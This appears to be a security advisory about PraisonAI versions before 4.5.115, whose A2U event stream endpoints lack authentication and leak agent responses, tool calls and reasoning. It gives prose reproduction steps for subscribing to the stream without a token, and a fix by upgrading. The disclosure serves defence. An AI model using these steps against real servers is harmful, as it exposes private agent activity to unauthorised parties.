PraisonAI Unauthenticated Event Stream Vulnerability in A2U Server

A vulnerability exists in PraisonAI versions prior to 4.5.115, where the A2U (Agent-to-User) event stream server exposes all agent activity without authentication. The issue arises because the create_a2u_routes() function registers several endpoints, including /a2u/info, /a2u/subscribe, /a2u/events/{stream_name}, /a2u/events/sub/{id}, and /a2u/health, without any authentication checks. This vulnerability allows an unauthenticated attacker to subscribe to event streams and receive real-time updates of all agent activities, including responses, tool usage, and internal reasoning, thereby exposing sensitive information to any network attacker.

Impact

Exploitation of this vulnerability allows for the unauthorized subscription to A2U event streams, with real-time access to all agent events, including responses, tool call details, and internal reasoning.

Reproduction

To reproduce this vulnerability, send a POST request to the /a2u/subscribe endpoint without an authentication token. This will return a subscription_id. Then, use this subscription_id to access the /a2u/events/sub/{id} endpoint, which will stream all agent events live, including responses, tool calls, and the agent's thought process.

Remediation

Users can upgrade to PraisonAI version 4.5.115 or later to address this vulnerability.